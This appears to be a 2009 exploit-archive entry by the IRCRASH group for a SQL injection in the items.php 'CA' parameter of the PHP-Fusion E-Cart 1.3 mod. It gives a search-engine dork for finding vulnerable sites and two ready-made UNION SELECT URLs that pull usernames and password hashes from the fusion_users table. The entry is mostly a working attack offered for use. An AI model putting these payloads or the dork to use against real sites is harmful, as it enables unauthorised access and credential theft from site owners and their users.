[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP-Fusion Mod E-Cart 1.3 (items.php CA) SQL Injection Vulnerability
# Published : 2009-01-07
# Author : IRCRASH
# Previous Title : PHP-Fusion Mod Members CV (job) 1.0 SQL Injection Vulnerability
# Next Title : QuoteBook (poll.inc) Remote Config File Disclosure Vulnerability
#####################################################################################
#### PHP-Fusion Mod E-Cart Sql Injection ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
# #
#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=281
# #
#Dork : inurl:/infusions/e_cart #
# #
#####################################################################################
# [Bug] #
# #
#Username : http://Site/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select%20user_name,1,2%20from%20fusion_users/*
# #
#Password : http://Site/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select%20user_password,1,2%20from%20fusion_users/*
# #
#####################################################################################
# Site : Http://IRCRASH.COM #
###################################### TNX GOD ######################################
# www.Syue.com [2009-01-07]